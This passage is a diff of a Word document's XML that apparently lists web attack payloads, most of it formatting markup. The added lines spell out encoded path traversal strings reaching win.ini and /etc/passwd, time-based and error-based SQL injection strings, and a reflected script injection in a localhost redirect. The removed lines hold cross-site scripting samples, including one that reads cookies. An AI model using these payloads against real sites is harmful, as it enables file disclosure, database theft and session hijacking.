+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>%</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>255c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>windows</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>win.ini</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/cgi-bin</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/.%</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>URL:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:before="0"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>%2c(select%20*%20from%20(select(sleep(10)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>))a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:before="0"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:before="0"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">' </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-GB"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 in (select min(name) from sysobjects where xtype = 'U' and name &gt; '.') --</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="59636E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>/page</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>asp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>?id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="CF222E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="0550AE"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="59636E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="59636E"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> true</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
       <w:hyperlink r:id="rId5" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
           </w:rPr>
           <w:t>http://localhost/login?redirect=%3Cscript%3Ealert(1)%3C/script%3E</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>&lt;a onmouseover="alert(document.cookie)"\&gt;xxs link\&lt;/a\&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="nt"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="3F6EC6"/>
-        </w:rPr>
-        <w:t>IMG</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="err"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-        </w:rPr>
-        <w:t>"""</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>&gt;&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="nt"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="3F6EC6"/>
-        </w:rPr>
-        <w:t>SCRIPT</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="nx"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-        </w:rPr>
-        <w:t>alert</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="s2"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1C7D4D"/>
-        </w:rPr>
-        <w:t>"XSS"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>)&lt;/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="nt"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="3F6EC6"/>
-        </w:rPr>
-        <w:t>SCRIPT</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
-        </w:rPr>
-        <w:t>"\&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>&lt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="nt"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="3F6EC6"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="na"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>href</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="o"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>=</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="s"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="1C7D4D"/>
-        </w:rPr>
-        <w:t>"javascript:alert(String.fromCharCode(88,83,83))"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="36464E"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
-        </w:rPr>
-        <w:t>Click Me!</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>&lt;/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="nt"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="3F6EC6"/>
-        </w:rPr>
-        <w:t>a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rStyle w:val="p"/>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p/>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId6" w:history="1">
